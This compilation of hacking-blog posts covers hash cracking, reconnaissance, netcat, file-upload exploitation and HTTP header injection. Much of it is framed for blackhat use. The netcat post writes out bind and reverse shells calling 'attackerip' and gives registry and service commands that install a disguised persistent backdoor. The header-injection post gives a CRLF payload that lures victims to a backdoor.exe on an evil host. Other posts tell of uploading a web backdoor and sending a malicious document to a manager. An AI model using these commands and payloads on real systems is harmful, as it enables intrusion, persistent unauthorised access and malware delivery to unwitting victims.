Cracking JOOMLA salted hash with hashcat(cudaHashcat-plus)

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Hashcat is a most fastest hash cracker. Hashcat really is a best hash cracking tools i ever seen. You can compare this tool with other tools and you will see what I mean. I rarely use any other tools instead hashcat to crack hash. Today I will show you that how we can crack joomla hash. My system is optimus technology. If your Computer also Optimus then you need to install bumblebee : www.bumblebee-project.org
Download:
science@BAD-LUCK:~/tools$ mkdir tools
science@BAD-LUCK:~/tools$ cd tools
science@BAD-LUCK:~/tools$wget -c http://hashcat.net/files/oclHashcat-plus-0.09.7z
science@BAD-LUCK:~/tools$ 7z x *
science@BAD-LUCK:~/tools$ cd oclHashcat-*
Note: I renamed my oclHashcat folder
science@BAD-LUCK:~/tools/hashcat-plus$ ls
cudaExample400.cmd cudaHashcat-plus32.exe example0.hash hashcat.pot oclExample400.sh oclHashcat-plus64.bin
charsets cudaExample400.sh cudaHashcat-plus64.bin example400.hash kernels oclExample500.cmd oclHashcat-plus64.exe
cudaExample500.cmd cudaHashcat-plus64.exe example500.hash oclExample0.cmd oclExample500.sh pass.txt
cudaExample0.cmd cudaExample500.sh docs example.dict oclExample0.sh oclHashcat-plus32.bin rules
cudaExample0.sh cudaHashcat-plus32.bin eula.accepted hashcat.hcstat oclExample400.cmd oclHashcat-plus32.exe vclHashcat-plus64.bin
In the 7z file hashcat for windows and Linux (32+64) both has been compressed. So plus(32/64).bin is for 64 bit or 32 bit. And the .exe file is for windows. So we need the cudaHashcat-plus64.bin.
Now see the all options:
science@BAD-LUCK:~/tools/hashcat-plus$ optirun ./cudaHashcat-plus64.bin –help
cudaHashcat-plus, advanced password recovery
Usage: cudaHashcat-plus [options]… hash|hashfile|hccapfile [dictionary|mask|directory]…
=======
Options
=======
* General:
-m, –hash-type=NUM Hash-type, see references below
-a, –attack-mode=NUM Attack-mode, see references below
-V, –version Print version
-h, –help Print help
–eula Print EULA
–quiet Suppress output
* Misc:
–runtime=NUM Abort session after NUM seconds of runtime
–hex-salt Assume salt is given in hex
–hex-charset Assume charset is given in hex
–force Ignore warnings
* Markov:
–markov-hcstat Specify hcstat file to use, default is hashcat.hcstat
–markov-disable Disables markov-chains, emulates classic brute-force
–markov-classic Enables classic markov-chains, no per-position enhancement
-t, –markov-threshold=NUM Threshold when to stop accepting new markov-chains
* Files:
-o, –outfile=FILE Define outfile for recovered hash
–outfile-format=NUM Define outfile-format for recovered hash, see references below
-p, –seperator=CHAR Define seperator char for hashlists and outfile
–show Show cracked passwords only
–left Show un-cracked passwords only
–username Enable ignoring of usernames in hashfile
–remove Enable remove of hash once it is cracked
–disable-potfile Do not write potfile
* Resources:
-c, –segment-size=NUM Size in MB to cache from the wordfile
–cpu-affinity=STR Locks to CPU devices, seperate with comma
–gpu-async Use non-blocking async calls (NV only)
-d, –gpu-devices=STR Devices to use, separate with comma
-n, –gpu-accel=NUM Workload tuning: 1, 8, 40, 80, 160
–gpu-loops=NUM Workload fine-tuning: 8 – 1024
–gpu-temp-disable Disable temperature and fanspeed readings and triggers
–gpu-temp-abort=NUM Abort session if GPU temperature reaches NUM degrees celsius
–gpu-temp-retain=NUM Try to retain GPU temperature at NUM degrees celsius (AMD only)
* Rules:
-j, –rule-left=RULE Single rule applied to each word from left dict
-k, –rule-right=RULE Single rule applied to each word from right dict
-r, –rules-file=FILE Rules-file, multi use: -r 1.rule -r 2.rule
-g, –generate-rules=NUM Generate NUM random rules
–generate-rules-func-min=NUM Force NUM functions per random rule min
–generate-rules-func-max=NUM Force NUM functions per random rule max
* Custom charsets:
-1, –custom-charset1=CS User-defined charsets
-2, –custom-charset2=CS Example:
-3, –custom-charset3=CS –custom-charset1=?dabcdef
-4, –custom-charset4=CS Sets charset ?1 to 0123456789abcdef
* Increment:
-i, –increment Enable increment mode
–increment-min=NUM Start incrementing at NUM
–increment-max=NUM Stop incrementing at NUM
==========
References
==========
* Outfile Formats:
1 = hash[:salt]
2 = plain
3 = hash[:salt]:plain
4 = hex_plain
5 = hash[:salt]:hex_plain
6 = plain:hex_plain
7 = hash[:salt]:plain:hex_plain
* Built-in charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?a = ?l?u?d?s
?s = !”#$%&'()*+,-./:;<=>?@[]^_`{|}~
?h = 8 bit characters from 0xc0 – 0xff
?D = 8 bit characters from german alphabet
?F = 8 bit characters from french alphabet
?R = 8 bit characters from russian alphabet
* Attack modes:
0 = Straight
1 = Combination
3 = Brute-force
6 = Hybrid dict + mask
7 = Hybrid mask + dict
* Generic hash types:
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
30 = md5(unicode($pass).$salt)
40 = md5($salt.unicode($pass))
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
130 = sha1(unicode($pass).$salt)
140 = sha1($salt.unicode($pass))
300 = MySQL
400 = phpass, MD5(WordPress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1500 = descrypt, DES(Unix), Traditional DES
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1800 = sha512crypt, SHA512(Unix)
2100 = Domain Cached Credentials2, mscash2
2400 = Cisco-PIX MD5
2500 = WPA/WPA2
2600 = Double MD5
3000 = LM
3100 = Oracle 7-10g, DES(Oracle)
3200 = bcrypt, Blowfish(OpenBSD)
* Specific hash types:
11 = Joomla
21 = osCommerce, xt:Commerce
101 = nsldap, SHA-1(Base64), Netscape LDAP SHA
111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
112 = Oracle 11g
121 = SMF > v1.1
122 = OSX v10.4, v10.5, v10.6
131 = MSSQL(2000)
132 = MSSQL(2005)
141 = EPiServer 6.x
1722 = OSX v10.7
2611 = vBulletin < v3.8.5
2711 = vBulletin > v3.8.5
2811 = IPB2+, MyBB1.2+
science@BAD-LUCK:~/tools/hashcat-plus$
 
Ah lots of options can be used!
We need few options:
-a //Attack mode
-m // hash type (11)
–increment // Need for try all length
–increment-min // Length start from minimum
–increment-max // Length Maximum.
-o // output for the cracked hash
path/target/hash/file //Tell where the hash file is located
-1 //mask 
So we need it like:
-a 3
-m 11
–increment
–increment-min=4
–increment-max=10
-o cracked.txt
crack/hash.txt
-1 ?l?u ?1?1?1?1?1?1?1?1?1?
Here, ?l=a-z, ?u=A-Z which should be declared in -1 option and in last ?1?1?1?1?1?1?1?1?1?1 mean how many length should be tested, In our case it 10th .
So All in one :
science@BAD-LUCK:~/tools/hashcat-plus$ optirun ./cudaHashcat-plus64.bin -a 3 -m 11 –increment –increment-min=4 –increment-max=10 -o crack/cracked.txt crack/hash.txt -1 ?l?d ?1?1?1?1?1?1?1?1?1?1
cudaHashcat-plus v0.09 by atom starting…
Hashes: 166 total, 166 unique salts, 166 unique digests
Bitmaps: 11 bits, 2048 entries, 0x000007ff mask, 8192 bytes
Workload: 256 loops, 80 accel
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce GT 525M, 1023MB, 1200Mhz, 2MCU
Device #1: Kernel ./kernels/4318/m0010_a3.sm_21.ptx
[s]tatus [p]ause [r]esume [b]ypass [q]uit =>
hashcat now trying to crack the hashes. If you type s the you will be able to see the progress of hashcat . For example:
[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Status…….: Running
Input.Mode…: Mask (?1?1?1?1?1)
Hash.Target..: File (crack/hash.txt)
Hash.Type….: Joomla
Time.Running.: 58 secs
Time.Left….: 3 secs
Time.Util….: 58232.2ms/203.6ms Real/CPU, 0.4% idle
Speed……..: 159.6M c/s Real, 160.3M c/s GPU
Recovered….: 2/166 Digests, 2/166 Salts
Progress…..: 9404743680/10037385216 (93.70%)
Rejected…..: 109117440/9404743680 (1.16%)
HWMon.GPU.#1.: -1% Util, 69c Temp, -1% Fan
[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Status…….: Running
Input.Mode…: Mask (?1?1?1?1?1?1)
Hash.Target..: File (crack/hash.txt)
Hash.Type….: Joomla
Time.Running.: 6 mins, 3 secs
Time.Left….: 26 mins, 53 secs
Time.Util….: 363169.9ms/188.2ms Real/CPU, 0.1% idle
Speed……..: 168.7M c/s Real, 168.8M c/s GPU
Recovered….: 14/166 Digests, 14/166 Salts
Progress…..: 64146636800/361345867776 (17.75%)
Rejected…..: 2866544640/64146636800 (4.47%)
HWMon.GPU.#1.: -1% Util, 74c Temp, -1% Fan
[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Status…….: Running
Input.Mode…: Mask (?1?1?1?1?1?1?1)
Hash.Target..: File (crack/hash.txt)
Hash.Type….: Joomla
Time.Running.: 1 min, 21 secs
Time.Left….: 19 hours, 12 mins
Time.Util….: 81672.0ms/194.0ms Real/CPU, 0.2% idle
Speed……..: 168.6M c/s Real, 169.1M c/s GPU
Recovered….: 17/166 Digests, 17/166 Salts
Progress…..: 17595105280/13008451239936 (0.14%)
Rejected…..: 3822059520/17595105280 (21.72%)
HWMon.GPU.#1.: -1% Util, 73c Temp, -1% Fan

Status says it cracked 17 hashes already. So :
science@BAD-LUCK:~/tools/hashcat-plus$ cat crack/cracked.txt
44e9fec8983b8d5b2519bc6cf43cfd5d:0rxvGVjsiQocyS3yDvce9Cwb1vZN9RHl:test
28643071c72373b01eb941ae4f3bb0a5:lq0jeJAZ1axYQOsK5Gu0XfEURqRicoDC:123456
Enjoy cracking!!!
Posted on sysexploits too

PENETRATION TESTING???

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

PENETRATION TESTING???
Penetration Testing can be done in 4 stages:
  1. Information Gathering.
  2. Enumeration and vulnerability analysis.
  3. Exploitation.
  4. Post Exploitation.
Penetesting is like a Actual hacking. By The same step a hacker get passed for their success. I am going explain here about Basic Information Gathering which is first stage for a hacker/pentester.
Information Gathering:
Information Gather is the most important stage for penetration tester. Because Here We can map our target network & Information gathering is First stage for making successful attack. How we can gather information and what we look for? There are many thing to find out before actual attack and exploitation. The more information we have the more effective attack we can make. There various way to gather information against our target network:
Open Source Intelligence Gathering.
Network Discovery & DNS enumeration.
Email Discovery and Foot printing.
Etc…..
Open Source Intelligence Gathering: For Open Source Intelligence Gathering may need week or even month. Because here Penetration tester looks for all public information, for example what the target networks are looking for, Perhaps they need of any employee, Maybe somewhere posted about there Internal System publicly etc. Not only that but also we need to find their email, phone number, physical address, social network information, DNS information etc. Actually time is depending you are hacker or a penetration tester. For pentester have only a limit time so they need gather these information as soon as possible. If we got hired by any company for a short time testing then no, of course we will not spend a long time here. But If we are hacker then our just goal is Success and for success we need to gather the information for making a effective attack. Anyway, We may gather information from:-
From The website:
We can gather much valuable information from the Target website such as phone number, Email address, Employee name, Comments in HTML source code, Even Physical Address which is very important for Social Engineering attack etc. Not only that we can also make a good wrodlist for dictionary based attack later on. So best is use of weget or httrack for downloading the entire website for reviewing off-line using your browser. After downloading it Just start browsing with your mind, see the source codes etc and you will find many information.
Job Posting:
The target organization may looking for employees. So they may posted It on their local or third party website. Often Many Organization post about their internal network such as Database name etc in Job description. They also post about all responsibility, conditions , salary range etc which is very good for Mapping the company structure. We can understand that what our target in need of and Internal contact information which is not a good option for making a Social Engineering attack? True History: I was sent my Malicious word document file to the manager. And the idiot got hacked immediately. Can you guess why? Even I was able to attack their MS SQL 2003 when they said that they were need someone who is good in MS SQL too.
So we should usually search the organization name in montser, careerbuilder, workforce etc.
Forum:
Perhaps we want to post a problem on a forum to be solved. So why not our target ? So they also may post the internal problem to get answer. For a better understanding of the problem they should post details … right? So here we/hacker/pentester may take a advantage because they may post code, configuration details and other information .
Social Media: Great way to find more additional important information. These media can be used for a effective social engineering attack. Often I try to search Company name, Employee name on Facebook, Linkdin, Twitter, MySpace. Some of employee post their phone number, email address, Like/dislike etc.
Search Engine: Search engine is a important and a powerful tool for gathering information. We can gather lots of information using Powerful search engine call “Google”. We can search file which can be financial report or employee list, emails what can be used for Social Engineering, Links such as “index.php?id=44” for SQLi, Related company etc.
site:sysexploits.net ; Which will discover all pages from the targets.
Links:sysexploits.net; this will find for all links
inurl:info.php site:sysexploits.net ; finding a specific URL.
Inurl:phpinfo.php
site:sysexploits.net inurl:phpinfo.php
filetype:sql ; Try with any other file type such as pdf,txt,xls,doc etc.
site:sysexploits.net filetype:sql
intitl:login
There are some tools you can use for Automated Google searching such as wikto,sitedigger,metagoofi etc.
There are many dork. I will refer you to visit http://www.exploit-db.com/google-dorks/
Also you may interest to visit a nice search engine: http://searchdns.netcraft.com/
Network Discovery & DNS Enumeration:
Here we need to discover all IP, DNS, Sub-Domain etc. Sometime we may need to even brute force for the Subdomain. So basically we deal with host,whois,nslookup,dig etc. We can it from other third party website too. There are many many providing such a nice services freely. One of them is http://centralops.net/co/. Go to site and type your target IP or Domain name to be analysis. Centralops is capable to seek whois records, DNS records(Nslookup?), Trace routing, Service scanning in same time.
DNS(Domain Name System) can provide us valuable information. DNS translate domain into IP(32 bits) and The default port is 53. There are numerous tools can be used for DNS enumeration:
  1. nslookup
  2. dig
  3. fierce (which can be used for brute forcing and really a good tool)
  4. whois
  5. host (command) etc.
Little explanation of DNS records for getting started:
A= Links a Host name to an IP.
NS= Name Server (I.E, ns1.sysexploits.net)
MX= Mail server Records
CNAM= Used to thread many names to a Single IP.
Email Discovery:
Emails are useful for hackers/pentester for social engineering attack. Often we need to discover email address . Using Google(Google is the master!!!) we can search email . For example if we search like “site:sysexploits.net contact”, “@sysexploits.net”, “site:sysexploits.net contact” and using some powerful tools such as maltego. Using NC we can even enumerate SMTP for username too.
These method are very basic and explained here very shortly(Just to give idea about “What is it and how” and I did not explain to use some tools here(Really?) but Hang around and we will publish more useful tutorials/informations.
Any Feedback is always welcome & Thanks for Reading!!!

DNS enumeration using fierce.pl

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I have seen fierce is a powerful tool for Dns Enumeration. Often I use it for Enumerating DNS. First this tool will check that if the site allow any zone transfer or not . If the Target site does not allow Zone transfer then it will start Brute forcing using a default wordlist came with the tool. But believe it or not most of time i got very good result from this tool. Try it out yourself please!!!.

This tool is written in perl:

fierce.pl (C) Copywrite 2006,2007 – By RSnake at http://ha.ckers.org/fierce/

        Usage: perl fierce.pl [-dns example.com] [OPTIONS]

Overview:
        Fierce is a semi-lightweight scanner that helps locate non-contiguous
        IP space and hostnames against specified domains.  It’s really meant
        as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all
        of those require that you already know what IP space you are looking
        for.  This does not perform exploitation and does not scan the whole
        internet indiscriminately.  It is meant specifically to locate likely
        targets both inside and outside a corporate network.  Because it uses
        DNS primarily you will often find mis-configured networks that leak
        internal address space. That’s especially useful in targeted malware.

Options:
        -connect        Attempt to make http connections to any non RFC1918
                (public) addresses.  This will output the return headers but
                be warned, this could take a long time against a company with
                many targets, depending on network/machine lag.  I wouldn’t
                recommend doing this unless it’s a small company or you have a
                lot of free time on your hands (could take hours-days). 
                Inside the file specified the text “Host:n” will be replaced
                by the host specified. Usage:

        perl fierce.pl -dns example.com -connect headers.txt

        -delay          The number of seconds to wait between lookups.
        -dns            The domain you would like scanned.
        -dnsfile        Use DNS servers provided by a file (one per line) for
                reverse lookups (brute force).
        -dnsserver      Use a particular DNS server for reverse lookups
                (probably should be the DNS server of the target).  Fierce
                uses your DNS server for the initial SOA query and then uses
                the target’s DNS server for all additional queries by default.
        -file           A file you would like to output to be logged to.
        -fulloutput     When combined with -connect this will output everything
                the webserver sends back, not just the HTTP headers.
        -help           This screen.
        -nopattern      Don’t use a search pattern when looking for nearby
                hosts.  Instead dump everything.  This is really noisy but
                is useful for finding other domains that spammers might be
                using.  It will also give you lots of false positives,
                especially on large domains.
        -range          Scan an internal IP range (must be combined with
                -dnsserver).  Note, that this does not support a pattern
                and will simply output anything it finds.  Usage:

        perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

        -search         Search list.  When fierce attempts to traverse up and
                down ipspace it may encounter other servers within other
                domains that may belong to the same company.  If you supply a
                comma delimited list to fierce it will report anything found.
                This is especially useful if the corporate servers are named
                different from the public facing website.  Usage:

        perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany

                Note that using search could also greatly expand the number of
                hosts found, as it will continue to traverse once it locates
                servers that you specified in your search list.  The more the
                better.
        -suppress       Suppress all TTY output (when combined with -file).
        -tcptimeout     Specify a different timeout (default 10 seconds).  You
                may want to increase this if the DNS server you are querying
                is slow or has a lot of network lag.
        -threads  Specify how many threads to use while scanning (default
          is single threaded).
        -traverse       Specify a number of IPs above and below whatever IP you
                have found to look for nearby IPs.  Default is 5 above and
                below.  Traverse will not move into other C blocks.
        -version        Output the version number.
        -wide           Scan the entire class C after finding any matching
                hostnames in that class C.  This generates a lot more traffic
                but can uncover a lot more information.
        -wordlist       Use a seperate wordlist (one word per line).  Usage:

        perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt

Download: http://ha.ckers.org/fierce/fierce.pl

Run: perl fierce.pl -dns yourtarget.net

Google Hacking!!!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Google is one of the best Search Engine . Not only that but also Google is very good friend of hackers. If you are very new to hacking then you may not know this but actually Most of public/private information we can gather using the Google, Even it is possible hack a server,website,random site using the Google.

Perhaps Somewhere i already explained  about Public information Gathering. Anyway, If you want be more expert, want know more about Google hacking, Want to learn the technique just Go here:

http://www.exploit-db.com/google-dorks/

Lots of dorks you will find in exploit-db. Hope you will enjoy!!!

Power of netcat

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Netcat actually is not a hacking tool. It is a networking tool. We can use it to communicate with other computers remotely, transferring data,Chatting etc. But We can also use it as Backdoor or hacking tool, For example “ping” is not hacking or DoS tool but we can DoS using “Ping” …no? So we can’t call it DDOSER tool.

 Anyway, Often netcat is called as “Swiss Army Knife” 

I will explain the basic usage of it now


All option in netcat:

nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] …
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e’; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, …
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp-data’).

We can use netcat as backdoor, banner grabbing, port scanning, chatting, file transfer, traffic redirection etc.

Banner Grabbing :

root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 368
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
</body></html>
 sent 16, rcvd 617

How: nc -vvv ip port . Then Hit enter twice.

Simply we see The version of Web server is Apache 2.2.21 (Wind32) . Not only that , We can see OpenSSL version, PHP version etc. Do you know how a scanner scan for vulnerability against a target? The Scanner first find the version of server/application, then check on the local database(For example nessus,acunetix etc). We also can start Google search vulnerability for specific version …. no?

The same way we can find other application version, information:

 root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.

 
You can try to connect to any port excluding 443 since netcat can’t communicate over ssl. Or do the tunneling.

Chat with your Hacker friend:

Suppose there are two hacker called hacker1 and hacker2. They don’t want to get caught for using other messenger, or they just do private communication.

How they are doing this ? Simple command :

hacker1(Netcat listening):

nc -vvv -l -p 44444

-vvv stand for verbose(as much as possible)

-l for listening(Opening the port to connect)

-p for port(any specific port to connect)

hacker2(Connecting to hacker1):

nc -vvv 192.168.96.129 4444   (4444 is the port)

hacker1

                                                                            hacker2

Transfer the File:

Hackers do not want to transfer the file via public file sharing server because of risk. But they can use netcat for transfer the file .

Suppose hacker1(Blackhat) has some passwords file on his computer ( 192.168.96.129) and want to transfer the file to hacker2( 192.168.1.213).

Hacker1 netcat command was:

nc -vvv -l -p 4444 <passwords.txt

hacker2 netcat command was:

nc -vvv 192.168.96.129 >passwords.txt

             
Let’s do a port scan using netcat:

we can scan port with simple command nc -vvv targetip 1-65535

or

 nc -vvv -z targetip 1-65535

  Here  extra “-z” option use Input output method.

simple to create a backdoor using netcat:

windows server mode:

nc -L -p 1337 -e cmd.exe

-L don’t die.
-e start command line.

Linux/Unix server mode:

nc -l -p 1337 -k -e /bin/bash

-k don’t die
-e command mode.

Connect to the server:

nc -vv targetip 1337

How about Reverse connection? Try the following on victim machin:

nc -e cmd -d attackerip  1337

On your  own computer(Attacker):

nc -vv -l -k -p 1337

Now you are thinking that how hacker can install the netcat on victim computer… right? ..

1. They first compromise the target system/server. And they want permanent access to the victim machine. So only way is uploading backdoor, setting it as start up application.                                                                                    
2. They create a batch file or shell script or downloader. Then sends it to the victim(Undetected by AV). Whenever the victim click on the script/batch it start downloading, installing etc automatically.

So how you make the netcat as stealth backdoor? Answer is by editing registry or moving to startup folder. Suppose you compromised an IIS web server and uploaded cmdasp.asp backdoor. Now you want to install the netcat as a stealth backdoor for some reason().

Netcat as start up backdoor:

Run this command:

reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v microsoft_service /t REG_SZ /d “c:nc.exe -d targetip 1337 -e cmd.exe”

Create a netcat listener on your local computer . Whenever the victim reboot his computer, he will get connected to you.

How about netcat as services ? try:

sc create microsoft_update binpath=”cmd /K start c:nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore 

Now try to make the backdoor to connect to you (hint: at).

By the way, you can do much more with netcat . netcat is not so bad as a backoor and if you can edit the C code netcat then it can be a supper backdoor. 
Try more….

More about it:

www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
en.wikipedia.org/wiki/Netcat
www.securityfocus.com/tools/139  (Download for windows)


Exploiting file upload vulnerability

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I did my job very quickly after found a File Uploading Vulnerability in a website. I was pentesting a network remotely (Blackbox testing) and it was really hard. I often browsed their website. Even I did not able to ping their IP because it was firewall . My only rest thing to be done was Social Engineering and Web pentesting (Really i was confused!!! If the SE and Web hacking method does not work then perhaps my heart about to attacked !!! lol(my heart is not weak)). Anyway, I scanned the site with various vulnerability scanner ,,,, no luck!!! So I started browsing the site manually(and Google searching randomly, Truthfully dunno what to find).

Suddenly I found a personal file upload link which was hell to find the link but my google friend helped me much. The link was like : www.hired-me.org/test/personal/re_al/file2010.php . It just accept 3 types of file extension JPEG, TEXT,CSV. First time i did not think that this link has any vulnerability(Already confused for the fucking scanner!!!).

How i exploited:

First i upload a jpeg file and try to find the location where it is saved. It was also hard(My knowledge is sucks?). OK, At least i found the jpeg file is located in the www.hired-me.com/index/hidden/director/test.jpeg  , Everything Okay. Now i quickly create a php file[test.php] :

<?php
echo “This is test”
?>

I quickly try to upload the “test.php” and “test.jpeg.php” but error “Unknown File Extension” . This error make me sure that the file extension is filtered.

Again i renamed the “test.php” to “test.php.jpeg” . Now no error!!! wow!!
I quickly check www.hired-me.com/index/hidden/director/test.php.jpeg and the page display “This is test“. Now i decide to upload a real php backdoor. Then upload some rooting tools then created ssh and then compromised two additional machine. Job is done!!!  

Feedback are welcome!!!

    

HTTP header injection

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

If we can inject newline into the header we control , then we will be able to insert some additional HTTP Header and some nasty body text. I don’t think so that we can compromised a website/server via this vulnerability. But still it is power for Social Engineering attack, Phishing, Redirecting to malicious site, downloading backdoor, virtual defacement, sometime injecting cookie  etc. It is much like XSS.

Basically this vulnerability found in “set-cookie” and “location”  . If we connect to a website:

nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
After this get request we get like(Try to find it):

set-cookie=PaymentMethod=credit

If this is behavior of the host then we should try to insert Carriage-return and Line-feed :

nc -vv target.com 80  
GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1

If the host is vulnerable then it will reply with a additional line “it-is=vulnerable” like this:

set-cookie=PaymentMethod=credi

it-is=vulnerable 

Simply a hacker can force the users to download a backdoor:

http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1

We can also create fake Cookie and send the url to the poor victim . Just think smartly and you will find some other way 😉

Be aware!!!

Finding Hidden File and directory of target website

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Discovering hidden file and directory is important for hackers and penetration tester. There are many webmaster/developer who are keeping Default, configuration file, admin page, database page insecurely. For example , Many time I was able to read database page(such as db.sql), configuration page (such as confg.php) etc. But Some 10% clever developer try to rename these file too . Anyway, Finding hidden file is important technique of Information gathering and finding vulnerability.
We can do this by Brute force and dictionary attack but it may take very long time , Also the target get DDOSED.
How is it working: Imagine , Our target site is www.false.com . Simply it has a User login page www.false.com/admini for login users. But we need to find out the the real administrator page so that we can login to edit their site…right? We also tried manually(Several time) submiting some random url like www.false.com/admininstrator, or admni etc but no luck . Instead doing this manually we have tools to do this automated and fast. The tool will submit many random directory and file and we have to understand the HTTP respond code (Do you know about 400,403,200 etc?). This is not only for finding admin page but also for finding configuration file, interesting directory, default file/directory even vulnerability(So we can call it URL fuzzing) etc. 
Warning: Remember it will logged all error (error.log/error_log.log file). So Some worry for getting caught and DDOSED 
There are many tools such dirbuster, burpsuite or custom python scripts etc which we can download to be done this job. But I am going to show you the owasp DirBuster (Go to the owasp.org for download it).
When we open the DirBuster(java -jar dirbuster.jar) , we get :

I have installed Joomla locally(Directory: /var/www/joomla. So going to attack my own site like:
 
Here my target URL is 192.168.1.214 , I ticked the “Go Faster” so that it can attack too quickly. And the dictionary file(/pentest/web/dirbuster/directory-list-1.0.txt). I want to fuzz my joomla site and the joomla installed in /joomla directory(192.168.1.214/joomla) and default PHP file to be fuzzed.
At last Click on the “Start”.

Here we see Type, Found , Response, Size, Include and Status section.
“Type” is telling us that it is file or directory, The “Found” Section telling that DirBuster found somethings, Response mean it is 200=OK, 404=not found, 403=Forbidden etc, “Size” telling that how kb/mb the page or directory(Sometime it is interesting when very different size of the found page/directory), “Status” telling that if the tool is still working .
Now simple Browse the all Found File and directory . Sometime you may get blank page, For example, When I try to browse 192.168.1.214/joomla/configuration.php because it is not readable. If the fool developer or webmaster chmod it as read then he got fucked.

We see the output that DirBuster found the “administrator” page (joomla/administrator/index.php) and the configuration file(joomla/configuration.php) which are really intersting.
Perhaps we can do some malicious things like LFI, SQLi etc. Just think a little bit about it.
Let me know if you catch any mistake(I love to learn)….

Tools: metagoofil (File search)

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

All penetration tester and hackers search files against their target site because it is important for information gathering (Custom Password, Internal idea about the company etc?). Google is friend of hacker or penetration tester. They search using Google foo or automated tools  such as metagoofil. Metagoofile is good python script for doing such job.

How to use:

simply type in Terminal/Konsole ” ./metagoofil.py” and you will get all options to use it.

Also they gave some example to use it. But here is practical usage:

root@bt:/pentest/enumeration/google/metagoofil# ./metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o microsoftfiles -f results.html

It will start searching and will automatic download the specified file (Lol be aware).

Now try against your own site for practice purpose.

I don’t think that we need someone to learn to use tools.

Easy man … So try everything!!!

Tools: goohost

The site moved to root domain where all post are imported. Please go to http://pusheax.com/


Goohost is a simple Bash script to search(Google) information against the target website. It search IP, Subdomain and IP and email.

Usage example:

cd /pentest/enumeration/goohost

/pentest/enumeration/google/goohost# ./goohost.sh -t backtrack-linux.org -m ip -p 10 -v

Type ./goohost for helps…